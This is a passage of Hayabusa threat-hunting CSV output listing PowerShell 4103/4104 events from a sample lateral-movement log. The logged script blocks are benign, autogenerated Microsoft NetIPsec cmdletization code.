'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [Cmdlet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"emptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [Cmdlet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Binding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Binding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.781 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.781 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.781 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.782 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.782 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.807 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.807 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.808 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote 